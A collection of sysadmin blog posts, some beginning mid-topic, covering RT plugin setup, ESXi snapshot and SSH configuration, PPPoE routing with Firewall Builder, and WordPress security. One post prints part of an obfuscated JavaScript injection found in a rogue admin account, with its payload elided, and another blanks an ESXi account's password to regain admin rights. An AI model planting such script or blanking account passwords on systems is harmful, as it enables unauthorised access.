I used RT 3.8.8 and RTx::EmailCompletion 0.06.

Installation

perl -MCPAN -e shell
 cpan> install RTx::EmailCompletion
 cpan> exit

When asked for the RT module location, write the path:

/opt/rt-3.8.8/lib

Add the plugin to the RT configuration

In the file “RT_SiteConfig.pm”, add the plugin to the “@Plugins” definition:

Set(@Plugins,(qw(RTx::EmailCompletion)));

Add the plugin configuration

Add the following text to the “RT_SiteConfig.pm”:

 # RTx::EmailCompletion
 #
 # Referencia:
 # http://search.cpan.org/~nchuche/RTx-EmailCompletion-0.06/lib/RTx/EmailCompletion.pm
 #
 # Para que busque los e-mails que comienzan con el texto ingresado:
 Set($EmailCompletionSearch, "STARTSWITH");
 # Campos de la tabla "Users" donde buscará el plugin:
 Set($EmailCompletionSearchFields, [qw(RealName Name)]);
 #
 # LDAP
 #
 Set($EmailCompletionLdapServer, "ldap.ces.edu.uy");
 Set($EmailCompletionLdapBase, "ou=hosting,o=ces");
 Set($EmailCompletionLdapFilter, "(&(objectClass=JammMailAccount)(accountActive=TRUE)(delete=FALSE))");
 # Atributos del LDAP en los que se hace la busqueda
 Set($EmailCompletionLdapAttrSearch, [qw/mail cn/]);
 Set($EmailCompletionLdapAttrShow, "mail");
 # Largo mínimo del texto para que se mande una consulta al LDAP
 Set($EmailCompletionLdapMinLength, 4);
 # Para mostrar los usuarios del LDAP:
 Set($EmailCompletionUnprivileged,"everybody");
 #
 # Deshabilito la busqueda en los usuario del RT. Solo buscara en el LDAP.
 # Esto es porque el RT tiene muchos Requestors mal escritos.
 Set($EmailCompletionRdbmsDisabled, 1);

Restart the web server

service httpd restart

Enjoy this plugin!

I recommend two simple but powerful tools to find out what’s best to delete/move from your disk when you urgently need more space:

Scanner

Written by Steffen Gerlach, freely distributable. It’s my favorite because its sunburst chart helps you get right away to that big file (log, installation ,etc.) that you don’t really need in the C: drive.

WinDirStat

It’s a little more complex, but has more features than Scanner. It allows to easily relate the graphical representation of disk space usage with the file and folder. Better suited for an in-depth analysis.

The plug-in installs as usual. It creates a new menu item: “Tools > Exploit Scanner”.

At the time of this writing, it has two features:

• Run a manual scan for potential exploits.
• Show the list of admin users.

In my blog, there should be only one admin user. Surprinsingly, there was also another one which was definitely not created by me.

In the “First Name” field of that user, there was a piece of malicious code. Here you have the head and tail (I placed dots to replace a really long line of code):

<script LANGUAGE="JavaScript">function Decode(){var temp="",i,c=0,out="";var str="46!46!46!32!60!98!...............!99!114!105!112!116!62!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);} </script><script LANGUAGE="JavaScript"> Decode(); </SCRIPT>

I really recommend this tool. Bringing my attention the admin users list was worth installing and trying. You may find other pieces of suspicious code in the scan, but you need some programming skills because most warnings are false positives.

After migrating to Windows 7, I realized that there’s no WAB! After recovering from the first shock, I thought there should be a replacement for such a simple, basic functionality. After googling a little, Windows Contacts looked like the replacement for WAB, but it was so simple that I just could search for names. No search capabilities for addresses, phones or notes. That’s not enough.

Here I’ll show you how to improve searches on Windows Contacts information.

Windows Contacts

Windows Contacts is nothing but a folder with text files containing contact information shown in a fancy way. You can see every contact as a single file and open every file to see your contacts information, but you can only search on the first and last name. This is too simple and is far from the functionality I had with WAB.

The Windows Contacts folder is in:

C:\Users\YourUserName\Contacts

I suggest you to create a shortcut to this folder and place it in your Desktop.

To import WAB information into Windows Contacts, just double-click on the “.wab” file and Windows 7 will offer to import the information.

First alternative for basic search: Windows Live Mail

Windows Live Mail is (kind of) a replacement for good ‘n’ old Outlook Express. It’s not shipped with Windows 7. You may download the installer from the Windows Live Mail home page.

When Windows Live Mail opens, you’ll see a menu on the bottom left with several tools, including “Contacts”. Click on the Contacts menu item. On the Windows Live Contacts, you’ll find a search box that helps you find contacts by name, phone number and e-mail address. Nice, but no capabilities to search for information on other informations fields, like “Notes”.

Search for any contact information: configure Windows 7 advanced search options

Follow these simple steps:

1. Click the Start button and in the search box at the very bottom type “how windows searches” and choose the result
2. Click on “Advanced”
3. Click on the “File Types” tab
4. Look for the “contact” extension and highlight it by clicking on the row
5. Change the indexing property to “Index Properties and File Contents”. The value of  “Filter Description” column for the “contacts” extension will change to “Plain text Filter”.
6. Click OK. Windows will rebuild some indexes.

When the index rebuild process finishes, open the Contacts folder. In the search box, write the text you are looking for between quotation marks and Windows will look on every text inside the contacts file.

As an example, I have my contacts birthday as part of the “Notes” field, always with the same format (mm/dd). Then, if I want to look for someone whose birthday is on April 25, I’ll wirte the following text in the Contacts search box:

"04/25"

If you don’t use quotation marks, some characters, like slashes, may not be correctly interpreted.

You can specify the snapshot you want to delete by using the “snapshotLevel” parameter. Snapshots are ordered from oldest to newest. The oldest snapshot has snapshotLevel=0.

First of all, you need to know your virtual machine ID. You can get the ID’s of all VM’s with the following command:

vim-cmd vmsvc/getallvms

In the next commands, I will use the variable “$VM_ID” to represent the Virtual machine ID.

To find out the number of snapshots for your VM, you can use the following commands:

VM_ID=YOUR_VIRTUAL_MACHINE_ID
vim-cmd vmsvc/snapshot.get $VM_ID | egrep -- '--\|-CHILD|^\|-ROOT' | wc -l

To remove only the last snapshot for a given VM, use the following commands:

SNAPSHOT_COUNT=`vim-cmd vmsvc/snapshot.get $VM_ID | egrep -- '--\|-CHILD|^\|-ROOT' | wc -l`
vim-cmd vmsvc/snapshot.remove $VM_ID false $(($SNAPSHOT_COUNT-1)) 0

That’s it. I suggest you to test your scripts with a dummy virtual machine. Use at your own risk!

As an example, I used one of the harmless tasks in VMware: creating a snapshot. Here’s a script that will wait for a createSnapshot task until it finishes, showing the final state:

#/bin/ash
#######################################################################################
#
#   Check snapshot completion
#
#   Author:    Marcos Orfila <www.marcosorfila.com>
#   Last modified:
#              2010-10-23   (Marcos Orfila)
#
#######################################################################################

# Delay for the check loop, in seconds
DELAY=5

#######################################################################################

# Check parameters
VM_NAME=$1
if [ -z "$VM_NAME" ]
then
 echo "ERROR: not enough parameters"
 echo
 echo "   Usage:   $0 vmname"
 echo
 exit 1
fi

VM_ID=`vim-cmd vmsvc/getallvms | grep "$VM_NAME/" | awk '{print $1}'`
if [ -z "$VM_ID" ]; then
 echo "ERROR: unknown virtual machine ($VM_NAME)"
 exit 1
fi

TASK_ID=`vim-cmd vimsvc/task_list | grep "$VM_ID-vim.VirtualMachine.createSnapshot" | cut -d':' -f2 | cut -d"'" -f1`
if [ -z "$TASK_ID" ]; then
 echo "ERROR: no createSnapshot tasks found for $VM_NAME"
 exit 1
fi

echo -n "Snapshot for $VM_NAME is being created."
while true; do
 STATE=`vim-cmd vimsvc/task_info $TASK_ID | grep 'state = ' | cut -d'"' -f2`
 case "$STATE" in
 "running")
 echo -n '.'
 sleep $DELAY
 ;;
 "success")
 echo " OK"
 break
 ;;
 *)
 echo " ERROR"
 echo "The snapshot task ended with state $STATE (it should be 'success')"
 exit 1
 ;;
 esac    
done

To adapt this script to other kind of tasks, you might change the line for the “TASK_ID” variable and maybe the values for the acceptable state values in the “case” sentence.

There are some things to consider when the PPPoE connection is setup in this scenario.

The Basics

In this section, I’ll explain how to configure a PPPoE interface in CentOS.

1) Install required software

# yum install rp-pppoe

2) Configure the PPPoE connection

The following is the output of the adsl-setup command. The answers are in bold text:

[root@fw ~]# adsl-setup
Welcome to the ADSL client setup.  First, I will run some checks on
your system to make sure the PPPoE client is installed properly...

LOGIN NAME

Enter your Login Name (default root): adsl-user-name

INTERFACE

Enter the Ethernet interface connected to the ADSL modem
For Solaris, this is likely to be something like /dev/hme0.
For Linux, it will be ethX, where 'X' is a number.
(default eth0): eth2

Do you want the link to come up on demand, or stay up continuously?
If you want it to come up on demand, enter the idle time in seconds
after which the link should be dropped.  If you want the link to
stay up permanently, enter 'no' (two letters, lower-case.)
NOTE: Demand-activated links do not interact well with dynamic IP
addresses.  You may have some problems with demand-activated links.
Enter the demand value (default no): no

DNS

Please enter the IP address of your ISP's primary DNS server.
If your ISP claims that 'the server will provide dynamic DNS addresses',
enter 'server' (all lower-case) here.
If you just press enter, I will assume you know what you are
doing and not modify your DNS setup.
Enter the DNS information here: (Press ENTER)

PASSWORD

Please enter your Password: ***********
Please re-enter your Password: ***********

USERCTRL

Please enter 'yes' (three letters, lower-case.) if you want to allow
normal user to start or stop DSL connection (default yes): no

FIREWALLING

Please choose the firewall rules to use.  Note that these rules are
very basic.  You are strongly encouraged to use a more sophisticated
firewall setup; however, these will provide basic security.  If you
are running any servers on your machine, you must choose 'NONE' and
set up firewalling yourself.  Otherwise, the firewall rules will deny
access to all standard servers like Web, e-mail, ftp, etc.  If you
are using SSH, the rules will block outgoing SSH connections which
allocate a privileged source port.

The firewall choices are:
0 - NONE: This script will not set any firewall rules.  You are responsible
 for ensuring the security of your machine.  You are STRONGLY
 recommended to use some kind of firewall rules.
1 - STANDALONE: Appropriate for a basic stand-alone web-surfing workstation
2 - MASQUERADE: Appropriate for a machine acting as an Internet gateway
 for a LAN
Choose a type of firewall (0-2): 0

Start this connection at boot time

Do you want to start this connection at boot time?
Please enter no or yes (default no):yes

** Summary of what you entered **

Ethernet Interface: eth2
User name:          adsl-user-name
Activate-on-demand: No
DNS:                Do not adjust
Firewalling:        NONE
User Control:       no
Accept these settings and adjust configuration files (y/n)? y
Adjusting /etc/sysconfig/network-scripts/ifcfg-ppp0
Adjusting /etc/ppp/chap-secrets and /etc/ppp/pap-secrets
 (But first backing it up to /etc/ppp/chap-secrets.bak)
 (But first backing it up to /etc/ppp/pap-secrets.bak)

Congratulations, it should be all set up!

Type '/sbin/ifup ppp0' to bring up your xDSL link and '/sbin/ifdown ppp0'
to bring it down.
Type '/sbin/adsl-status /etc/sysconfig/network-scripts/ifcfg-ppp0'
to see the link status.

[root@fw ~]#

Define the Ethernet Interface!

Even though it’s not mandatory to configure the Ethernet interface (e.g. eth2) connected to the PPPoE device, it is highly recommended that you do it. This will avoid the OS to recognize the Ethernet interface with a different name. If this happens, the PPPoE setup scripts will not find the Ethernet interface and the PPPoE interface (e.g. ppp0) will not be setup.

In the following example, the Ethernet interface eth2 is erroneously recognized as “__tmp1109941636“:

[root@fw ~]# ifconfig -a
__tmp1109941636 Link encap:Ethernet  HWaddr 00:E0:4C:55:5E:37
 BROADCAST MULTICAST  MTU:1500  Metric:1
 RX packets:4940 errors:0 dropped:0 overruns:0 frame:0
 TX packets:499 errors:0 dropped:0 overruns:0 carrier:0
 collisions:0 txqueuelen:1000
 RX bytes:393404 (384.1 KiB)  TX bytes:100208 (97.8 KiB)
 Interrupt:209 Base address:0x4400 

eth0      Link encap:Ethernet  HWaddr 00:08:A1:B5:F5:DC
 inet addr:200.1.1.2  Bcast:200.1.1.3  Mask:255.255.255.252
 inet6 addr: fe80::208:a1ff:feb5:f5dc/64 Scope:Link
 UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
 RX packets:220 errors:0 dropped:0 overruns:0 frame:0
 TX packets:29 errors:0 dropped:0 overruns:0 carrier:0
 collisions:0 txqueuelen:1000
 RX bytes:16646 (16.2 KiB)  TX bytes:3971 (3.8 KiB)
 Interrupt:217 Base address:0xe000 

eth1      Link encap:Ethernet  HWaddr 00:08:A1:82:69:99
 inet addr:10.10.10.1  Bcast:10.10.10.255  Mask:255.255.255.0
 inet6 addr: fe80::208:a1ff:fe82:6999/64 Scope:Link
 UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
 RX packets:4940 errors:0 dropped:0 overruns:0 frame:0
 TX packets:501 errors:0 dropped:0 overruns:0 carrier:0
 collisions:0 txqueuelen:1000
 RX bytes:393404 (384.1 KiB)  TX bytes:100708 (98.3 KiB)
 Interrupt:201 Base address:0xb000 

lo        Link encap:Local Loopback
 inet addr:127.0.0.1  Mask:255.0.0.0
 inet6 addr: ::1/128 Scope:Host
 UP LOOPBACK RUNNING  MTU:16436  Metric:1
 RX packets:8 errors:0 dropped:0 overruns:0 frame:0
 TX packets:8 errors:0 dropped:0 overruns:0 carrier:0
 collisions:0 txqueuelen:0
 RX bytes:560 (560.0 b)  TX bytes:560 (560.0 b) 

sit0      Link encap:IPv6-in-IPv4
 NOARP  MTU:1480  Metric:1
 RX packets:0 errors:0 dropped:0 overruns:0 frame:0
 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
 collisions:0 txqueuelen:0
 RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b) 

[root@fw ~]#

We can prevent this strange behavior by defining the eth2 interface with the minimum information, including the MAC Address. Create the file /etc/sysconfig/network-scripts/ifcfg-eth2 with the following text:

DEVICE=eth2
ONBOOT=no
HWADDR=70:5a:b6:95:4c:9b

Prevent default route overriding

When the PPPoE connection is setup, the existing default route is overridden by a new one created to make the PPPoE interface the default route. This is the default behavior.

As the PPPoE connection is secondary, you may want to prevent the PPPoE connection setup to override the default route. To do this, create the file /etc/ppp/ip-up.local with the following text:

#!/bin/bash
#
# When the PPPoE conection is established, the default
# route is overriden. Here we restore the default gateway
# as defined in "/etc/sysconfig/network".
DEFAULT_GATEWAY=`grep GATEWAY /etc/sysconfig/network | cut -d'=' -f2`
/sbin/route delete default
/sbin/route add default gw $DEFAULT_GATEWAY

Make the new script executable:

# chmod 755 /etc/ppp/ip-up.local

Testing

Use the following commands to test your configuration:

# ifdown ppp0
# ifup ppp0
# netstat -nr | egrep '^0.0.0.0'  # To show the default route

With the configuration explained in this article, the default route should not change when taking the PPPoE interface (e.g. ppp0) up/down.

Enjoy!

I was a happy sysadmin with my single-ISP fwbuilder configuration. Everything was simple, everything worked out of the box. One day, a PPPoE connection came by. I thought there was a simple solution built into Firewall Builder to cope with two ISP connections, but after a lot of googling, I found that there was a lot of people asking and just a few people giving directions to the starting point.

My goal was to keep most of the Internet traffic through the old ISP connection, which has a static IP, and browse the Internet through the PPPoE connection. All of this using Firewall Builder to manage my firewall.

Well then. Here’s how I did it.

Configure the PPPoE interface as a secondary connection

There are some considerations for a PPPoE interface when it’s going to work as a secondary connection (i.e. not the default route). Please read my post about PPPoE in a multiple-connection Linux firewall.

FWBuilder Policy Rules

Besides the rules that allow traffic (action “Accept”), the policy must include a rule with action “Tag” to mark packets to be routed through the secondary Internet connection.

TagService

Define a TagService object (Services > TagServices) in your Firewall Builder configuration:

Name	TagPPPoE
Code	4
Comment	Tag service to mark traffic routed through the PPPoE connection. IMPORTANT: the code value must match the MARK variable from file “/etc/init.d/ip_rules”.

I’ll explain file “/etc/init.d/ip_rules” later.

Policy rules

You must create at least two rules to allow HTTP and HTTPS to be routed through the secondary Internet connection, one rule to mark packets and another one to allow traffic. Both are very similar, so differences are in bold for ease of reading:

Source	Source IP address for HTTP and HTTPS traffic
Destination	Any
Service	http, https
Interface	Your firewall internal network interface
Direction	Inbound
Action	Tag (select the “TagPPPoE” TagService)
Time	Any
Options	(leave empty)
Comment	Tagging to let HTTP and HTTPS be routed through the PPPoE interface

Source	Source IP address for HTTP and HTTPS traffic
Destination	Any
Service	http, https
Interface	Your firewall internal network interface
Direction	Inbound
Action	Accept
Time	Any
Options	(leave empty)
Comment	Allow HTTP and HTTPS to the Internet

FWBuilder NAT Rules

You must create two separate NAT rules for outgoing network traffic, one rule for protocols routed through the secondary Internet connection and one for all the other network traffic. The order is important.

In the example, “fw-Static” and “fw-PPPoE” are the network interfaces for the static IP and the PPPoE (secondary) Internet connections respectively.

Original Src	IP’s of the internal network
Original Dst	Any
Original Srv	http, https
Translated Src	fw-PPPoE
Translated Dst	Original
Translated Srv	Original
Action	Translate
Options	(leave empty)
Comment	NAT rule to browse the Internet

Original Src	IP’s of the internal network
Original Dst	Any
Original Srv	Any
Translated Src	fw-Static
Translated Dst	Original
Translated Srv	Original
Action	Translate
Options	(leave empty)
Comment	Default outgoing NAT rule

You may need to add one NAT rule for each Internet connection.

Setting up the routing rules

The routing tables and ip rules are set outside Firewall Builder. Even though I may have used FWBuilder’s Epilog to add this code inside the policy, I preferred to create an RC script to load routing configuration right after the network RC script is executed.

You may download the “/etc/init.d/ip_rules” RC script from this link.

Update routing tables when PPPoE changes the IP

Every time the PPPoE connection changes its IP, the references to this interface in the routing tables are erased! The secondary routing table has the ppp0 interface as the default route, so you will lose your routing capabilities every time the PPPoE IP changes. Unless you do something

To automatically configure the routing information every time the PPPoE interface changes, add the following commands to file /etc/ppp/ip-up.local:

/etc/init.d/ip_rules start

Troubleshooting

Try the simplest FWBuilder Policy first (or even no FWBuilder policy at all)

Create the simplest policy in FWBuilder (i.e. allow all outgoing traffic, NATed with the external static IP) and then start adding the routing functionality. If it doesn’t work, try creating simple iptables rules to avoid using FWBuilder while configuring ip rules and routes.

Once the traffic routing is working, let FWBuilder join the party.

FWBuilder’s Kernel anti-spoofing protection

This option made me loose a lot of time!

You may find this firewall option in “Host OS Settings > Options > Kernel anti-spoofing protection”. It was set with value “On” and I changed it to “No Change” to make routing work correctly.

The symptoms were that returning TCP packets arrived correctly to the external PPPoE interface, but did not arrive to the internal Ethernet interface (I used “tcpdump” to see this). It worked right without applying FWBuilder policy, so I started diving into FWBuilder configuration, looking for uncommon things, until I found this option to be the root of all evil… several extra hours later

Conclusion

This solution allows the Firewall administrator to easily modify the traffic routed through the secondary Internet connection. Routing other traffic through additional network interfaces may require changes in the “/etc/init.d/ip_rules” RC script (just another routing table and another ip rule), but network interfaces seldom change, so 99% of the job is done through Firewall Builder.

Currently, it is not possible to use vmktree with a VMware ESXi 4.1 host with ssh root logins disabled. This is due to the lack of the “sudo” command in ESXi 4.1 and the required administrative privileges for vmktree commands that are run in the ESXi host.

I do not recommend setting up an ESXi with ssh root logins enabled just like any other user. Instead, with the purpose of setting up a reasonable security level and allow the excellent functionality provided by vmktree, I suggest configuring SSH in the ESXi server to disable ssh root password logins. Non-privileged users would be allowed ssh login providing a password, but root ssh logins will require a private key. Protecting that private key with the root permissions of another server will make root ssh logins to the ESXi server as secure as root access on the server that holds the private key.

The configuration steps are as follow:

Configure SSH in the ESXi

Edit “/etc/inetd.conf” and add option “-g” to disable root ssh logins using password. Check that option “-w” is not included.

The ssh lines in “/etc/inetd.conf” should look like this:

ssh      stream   tcp   nowait   root   /sbin/dropbearmulti   dropbear ++min=0,swap,group=shell -g -i -K60
ssh      stream   tcp6  nowait   root   /sbin/dropbearmulti   dropbear ++min=0,swap,group=shell -g -i -K60

To see all dropbear (ssh server) options, you may execute the following commands:

# ln -s /sbin/dropbearmulti /tmp/dropbear
# /tmp/dropbear -h

To apply changes to the inetd, execute:

# kill -HUP `cat /var/run/inetd.pid`

Generate SSH key pair in the vmktree server

In my network, vmktree is installed in a Linux box, so I’ll use OpenSSH commands to generate the key pair.

# ssh-keygen -t rsa -b 2048

Accept the default file name (/root/.ssh/id_rsa) and do not enter a passphrase (just hit the ENTER key when asked for a password). The command will create files “id_rsa” (private key) and “id_rsa.pub” (public key). Keep the former private since the security secheme is based on it.

Make sure that your “/root/.ssh” folder has permissions only for root. If in doubt, execute:

# chmod 700 /root/.ssh

Configure SSH logins using keys

Copy file “id_rsa.pub” to the “/.ssh” folder in the ESXi host.
Now login to the vmktree server as root and try an ssh root login to your ESXi server. The ssh root login will only work from this host and logged in as root.

Configure a new ESXi in the vmktree server

To add a new ESXi host to vmktree (e.g “myesxi”), login as root and execute the following commands (press ENTER when asked for a password):

# vmktree-addesx myesxi root

The output should be something like this:

[root@linuxbox ~]# /usr/bin/vmktree-addesx myesxi root
root's password:

Warning: root ssh login is disabled by default. Details here -> http://kb.vmware.com/selfservice/viewContent.do?language=en_US&externalId=8375637
A normal user is normally prefered over root for this task.

Please wait. This will probably take 15-20 seconds....

You have activated Tech Support Mode.
The time and date of this activation have been sent to the system logs.

VMware offers supported, powerful system administration tools. Please
see www.vmware.com/go/sysadmintools for details.

Tech Support Mode may be disabled by an administrative user.
Please consult the ESXi Configuration Guide for additional
important information.

[root@myesxi /]$ exit
Connection to myesxi closed.

Successfully added the needed trust relation ship to the esx server.

cron entry already exists.
ash: chage: not found

ESX account info for root:

Successfully added statistic collection from myesxi.

You should start seeing stats from myesxi in a few minutes.
[root@inuxbox ~]#

Then you should add cron lines like this:

* * * * * root /usr/bin/vmktree-esx3-collector myesxi root 2>&1 >/dev/null

That’s it. Wait for a while and you will see the information collected in the vmktree web page.

User “dcui” is Administrator by default, so we can use it to login and remove the wrong permissions for the “root” group.

Change file “/etc/passwd” to assign “/bin/ash” as the shell and change file “/etc/shadow” to blank dcui’s password. The lines for dcui should look like this:

~ # grep dcui /etc/passwd
dcui:x:100:100:DCUI User:/:/bin/ash
~ #
~ # grep dcui /etc/shadow
dcui::13358:0:99999:7:::
~ #

After these changes, login with user “dcui” using the vSphere Client and remove group “root” from the host permissions list. You may see an error message, but the group is removed anyway.

A piece of advice: always keep an Administrator user other that root, and make sure this user does not belong to the same groups user root belongs to. You may keep this user disabled with neither password nor shell, just like the default setting for user “dcui”.